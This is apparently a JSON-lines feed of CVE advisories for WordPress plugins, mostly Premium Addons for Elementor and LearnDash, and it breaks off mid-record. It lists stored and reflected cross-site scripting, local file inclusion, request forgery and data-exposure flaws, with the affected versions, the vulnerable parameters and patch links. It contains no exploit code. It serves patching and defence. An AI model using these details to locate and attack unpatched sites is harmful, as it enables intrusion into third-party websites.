{"CVE_ID":"CVE-2024-4376","slug":"premium-addons-for-elementor","versionImpact":"4.10.31","versionEndExcluding":"4.10.32","description":"The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Fancy Text widget in all versions up to, and including, 4.10.31 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. While 4.10.32 is patched, it is recommended to update to 4.10.33 because 4.10.32 caused a fatal error.","recommendation":"Update to version 4.10.32, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b49d166f-4df0-4997-a078-0be8fcd92576?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b49d166f-4df0-4997-a078-0be8fcd92576?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/widgets\\\/premium-fancytext.php#L924\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/widgets\\\/premium-fancytext.php#L924\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/assets\\\/frontend\\\/js\\\/typed.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/assets\\\/frontend\\\/js\\\/typed.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090037\\\/premium-addons-for-elementor\\\/trunk\\\/widgets\\\/premium-fancytext.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090037\\\/premium-addons-for-elementor\\\/trunk\\\/widgets\\\/premium-fancytext.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3090609%40premium-addons-for-elementor&new=3090609%40premium-addons-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3090609%40premium-addons-for-elementor&new=3090609%40premium-addons-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4205","slug":"premium-addons-for-elementor","versionImpact":"4.10.31","versionEndExcluding":"4.10.32","description":"The Premium Addons for Elementor plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_template_content() function in all versions up to, and including, 4.10.31. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve Elementor template data.","recommendation":"Update to version 4.10.32, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/175cb977-dcba-429f-814c-6de078e23472?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/175cb977-dcba-429f-814c-6de078e23472?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/tags\\\/4.10.28\\\/includes\\\/addons-integration.php#L1408\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/tags\\\/4.10.28\\\/includes\\\/addons-integration.php#L1408\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090037\\\/premium-addons-for-elementor\\\/trunk\\\/includes\\\/addons-integration.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090037\\\/premium-addons-for-elementor\\\/trunk\\\/includes\\\/addons-integration.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4378","slug":"premium-addons-for-elementor","versionImpact":"4.10.31","versionEndExcluding":"4.10.32","description":"The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's menu and shape widgets in all versions up to, and including, 4.10.30 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.10.32, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f891a6c8-3d06-432e-8651-bb689015af1c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f891a6c8-3d06-432e-8651-bb689015af1c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/includes\\\/pa-nav-menu-walker.php#L394\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/includes\\\/pa-nav-menu-walker.php#L394\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/modules\\\/premium-shape-divider\\\/module.php#L1047\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/modules\\\/premium-shape-divider\\\/module.php#L1047\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090037\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090037\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4203","slug":"premium-addons-for-elementor","versionImpact":"4.10.30","versionEndExcluding":"4.10.31","description":"The Premium Addons Pro for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the maps widget in all versions up to, and including, 4.10.30 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Please note this only affects sites running the premium version of the plugin.","recommendation":"Update to version 4.10.31, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51fab95e-336d-4544-8b8e-c4e9002321ec?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51fab95e-336d-4544-8b8e-c4e9002321ec?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3078006\\\/premium-addons-for-elementor\\\/trunk\\\/widgets\\\/premium-maps.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3078006\\\/premium-addons-for-elementor\\\/trunk\\\/widgets\\\/premium-maps.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1208","slug":"sfwd-lms","versionImpact":"4.10.2","versionEndExcluding":"4.10.3","description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions.","recommendation":"Update to version 4.10.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae735117-e68b-448e-ad41-258d1be3aebc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae735117-e68b-448e-ad41-258d1be3aebc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.learndash.com\\\/release-notes\\\/\",\"name\":\"https:\\\/\\\/www.learndash.com\\\/release-notes\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/karlemilnikka\\\/CVE-2024-1208-and-CVE-2024-1210\",\"name\":\"https:\\\/\\\/github.com\\\/karlemilnikka\\\/CVE-2024-1208-and-CVE-2024-1210\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3885","slug":"premium-addons-for-elementor","versionImpact":"4.10.28","versionEndExcluding":"4.10.29","description":"The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the subcontainer value parameter in all versions up to, and including, 4.10.28 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.10.29, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4111ba11-ad79-466a-9669-3c35730a331a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4111ba11-ad79-466a-9669-3c35730a331a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3075668%40premium-addons-for-elementor%2Ftrunk&old=3066988%40premium-addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3075668%40premium-addons-for-elementor%2Ftrunk&old=3066988%40premium-addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3647","slug":"premium-addons-for-elementor","versionImpact":"4.10.28","versionEndExcluding":"4.10.29","description":"The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's post ticker widget in all versions up to, and including, 4.10.28 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This requires the premium version of the plugin to be installed and activated in order to be exploited.","recommendation":"Update to version 4.10.29, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48fdece5-2996-426f-b77c-ae0b35bcd0ce?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48fdece5-2996-426f-b77c-ae0b35bcd0ce?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3075668\\\/premium-addons-for-elementor\\\/trunk\\\/widgets\\\/premium-post-ticker.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3075668\\\/premium-addons-for-elementor\\\/trunk\\\/widgets\\\/premium-post-ticker.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2399","slug":"premium-addons-for-elementor","versionImpact":"4.10.23","versionEndExcluding":"4.10.24","description":"The Premium Addons PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 4.10.23 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.10.24, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc057069-15cd-477f-9106-e616e919c62f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc057069-15cd-477f-9106-e616e919c62f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/tags\\\/4.10.23\\\/widgets\\\/premium-media-wheel.php#L2753\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/tags\\\/4.10.23\\\/widgets\\\/premium-media-wheel.php#L2753\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3051259\\\/premium-addons-for-elementor\\\/trunk\\\/widgets\\\/premium-media-wheel.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3051259\\\/premium-addons-for-elementor\\\/trunk\\\/widgets\\\/premium-media-wheel.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1680","slug":"premium-addons-for-elementor","versionImpact":"4.10.21","versionEndExcluding":"4.10.22","description":"The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Image Settings URL of the Banner, Team Members, and Image Scroll widgets in all versions up to, and including, 4.10.21 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.10.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e2d0b38-8241-456f-a79b-5d31132b3233?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e2d0b38-8241-456f-a79b-5d31132b3233?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3041548\\\/premium-addons-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3041548\\\/premium-addons-for-elementor\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2256","slug":"oik","versionImpact":"4.10.0","versionEndExcluding":"4.10.2","description":"The oik plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes such as bw_contact_button and bw_button shortcodes in all versions up to, and including, 4.10.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.10.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1266c6df-214b-4b6b-8f1d-a67385469bf5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1266c6df-214b-4b6b-8f1d-a67385469bf5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3049746%40oik&new=3049746%40oik&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3049746%40oik&new=3049746%40oik&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.oik-plugins.com\\\/shortcode_example\\\/bw_contact_button-security-fix\\\/\",\"name\":\"https:\\\/\\\/www.oik-plugins.com\\\/shortcode_example\\\/bw_contact_button-security-fix\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1210","slug":"sfwd-lms","versionImpact":"4.10.1","versionEndExcluding":"4.10.2","description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. This makes it possible for unauthenticated attackers to obtain access to quizzes.","recommendation":"Update to version 4.10.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/61ca5ab6-5fe9-4313-9b0d-8736663d0e89?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/61ca5ab6-5fe9-4313-9b0d-8736663d0e89?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.learndash.com\\\/release-notes\\\/\",\"name\":\"https:\\\/\\\/www.learndash.com\\\/release-notes\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/karlemilnikka\\\/CVE-2024-1208-and-CVE-2024-1210\",\"name\":\"https:\\\/\\\/github.com\\\/karlemilnikka\\\/CVE-2024-1208-and-CVE-2024-1210\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1209","slug":"sfwd-lms","versionImpact":"4.10.1","versionEndExcluding":"4.10.2","description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.","recommendation":"Update to version 4.10.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7191955e-0db1-4ad1-878b-74f90ca59c91?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7191955e-0db1-4ad1-878b-74f90ca59c91?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.learndash.com\\\/release-notes\\\/\",\"name\":\"https:\\\/\\\/www.learndash.com\\\/release-notes\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/karlemilnikka\\\/CVE-2024-1209\",\"name\":\"https:\\\/\\\/github.com\\\/karlemilnikka\\\/CVE-2024-1209\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0326","slug":"premium-addons-for-elementor","versionImpact":"4.10.18","versionEndExcluding":"4.10.19","description":"The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Link Wrapper functionality in all versions up to, and including, 4.10.17 due to insufficient input sanitization and output escaping on user supplied links. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.10.19, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22ba0eaf-f514-420a-9680-8126f6dcdde9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22ba0eaf-f514-420a-9680-8126f6dcdde9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/modules\\\/premium-wrapper-link\\\/module.php#L173\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/modules\\\/premium-wrapper-link\\\/module.php#L173\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/includes\\\/class-premium-template-tags.php#L1638\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/includes\\\/class-premium-template-tags.php#L1638\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/widgets\\\/premium-button.php#L1709\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/widgets\\\/premium-button.php#L1709\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3022824\\\/premium-addons-for-elementor\\\/trunk\\\/modules\\\/premium-wrapper-link\\\/module.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3022824\\\/premium-addons-for-elementor\\\/trunk\\\/modules\\\/premium-wrapper-link\\\/module.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4857","slug":"newsletters-lite","versionImpact":"4.9.9.9","versionEndExcluding":"4.10","description":"The Newsletters plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.9.9.9 via the 'file' parameter. This makes it possible for authenticated attackers, with Administrator-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 4.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsletters-lite\\\/trunk\\\/wp-mailinglist.php#L1584\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsletters-lite\\\/trunk\\\/wp-mailinglist.php#L1584\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3303758\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3303758\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33c0838a-5f86-4368-8bf9-da0582acbabf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33c0838a-5f86-4368-8bf9-da0582acbabf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1467","slug":"astra-sites","versionImpact":"4.1.6","versionEndExcluding":"4.1.7","description":"The Starter Templates \u2014 Elementor, WordPress & Beaver Builder Templates plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 4.1.6 via the ai_api_request(). This makes it possible for authenticated attackers, with contributor-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"Update to version 4.1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3074863\\\/astra-sites\\\/tags\\\/4.1.7\\\/inc\\\/classes\\\/class-astra-sites.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3074863\\\/astra-sites\\\/tags\\\/4.1.7\\\/inc\\\/classes\\\/class-astra-sites.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3074863\\\/astra-sites\\\/tags\\\/4.1.7\\\/inc\\\/classes\\\/class-astra-sites-importer.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3074863\\\/astra-sites\\\/tags\\\/4.1.7\\\/inc\\\/classes\\\/class-astra-sites-importer.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf5075f9-9658-4a09-bd38-34a72f6560f4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf5075f9-9658-4a09-bd38-34a72f6560f4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6889","slug":"secure-copy-content-protection","versionImpact":"4.1.6","versionEndExcluding":"4.1.7","description":"The Secure Copy Content Protection and Content Locking WordPress plugin before 4.1.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9651abd1-0f66-418e-85a7-2de0c5e91bed\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9651abd1-0f66-418e-85a7-2de0c5e91bed\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6888","slug":"secure-copy-content-protection","versionImpact":"4.1.6","versionEndExcluding":"4.1.7","description":"The Secure Copy Content Protection and Content Locking WordPress plugin before 4.1.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f4df74c2-4c95-4d1c-97c1-ebfc225f6b93\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f4df74c2-4c95-4d1c-97c1-ebfc225f6b93\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6665","slug":"kbucket","versionImpact":"4.1.5","versionEndExcluding":"4.1.6","description":"The KBucket: Your Curated Content in WordPress plugin before 4.1.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a0b3335f-6e04-402f-8cfd-fc4c62e52168\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a0b3335f-6e04-402f-8cfd-fc4c62e52168\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6667","slug":"kbucket","versionImpact":"4.1.4","versionEndExcluding":"4.1.5","description":"The KBucket: Your Curated Content in WordPress plugin before 4.1.5 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against admin.","recommendation":"Update to version 4.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d2b8ca6c-2b14-4d72-8e39-0f3ca5c23f56\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d2b8ca6c-2b14-4d72-8e39-0f3ca5c23f56\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13146","slug":"booknetic","versionImpact":"4.1.4","versionEndExcluding":"4.1.5","description":"The Booknetic WordPress plugin before 4.1.5 does not have CSRF check when creating Staff accounts, which could allow attackers to make logged in admin add arbitrary Staff members via a CSRF attack.","recommendation":"Update to version 4.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/19cb40dd-53b0-46db-beb0-1841e385ce09\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/19cb40dd-53b0-46db-beb0-1841e385ce09\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6737","slug":"enable-media-replace","versionImpact":"4.1.4","versionEndExcluding":"4.1.5","description":"The Enable Media Replace plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the SHORTPIXEL_DEBUG parameter in all versions up to, and including, 4.1.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. Exploiting this vulnerability requires the attacker to know the ID of an attachment uploaded by the user they are attacking.","recommendation":"Update to version 4.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c37d8218-6059-46f2-a5d9-d7c22486211e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c37d8218-6059-46f2-a5d9-d7c22486211e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3010103%40enable-media-replace%2Ftrunk&old=2990561%40enable-media-replace%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3010103%40enable-media-replace%2Ftrunk&old=2990561%40enable-media-replace%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4543","slug":"shortcode-variables","versionImpact":"4.1.4","versionEndExcluding":"4.1.5","description":"The Snippet Shortcodes plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.1.4. This is due to missing or incorrect nonce validation when adding or editing shortcodes. This makes it possible for unauthenticated attackers to modify shortcodes via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 4.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/127b20c4-cd7c-4d04-b32f-bcc26beb2c35?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/127b20c4-cd7c-4d04-b32f-bcc26beb2c35?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party 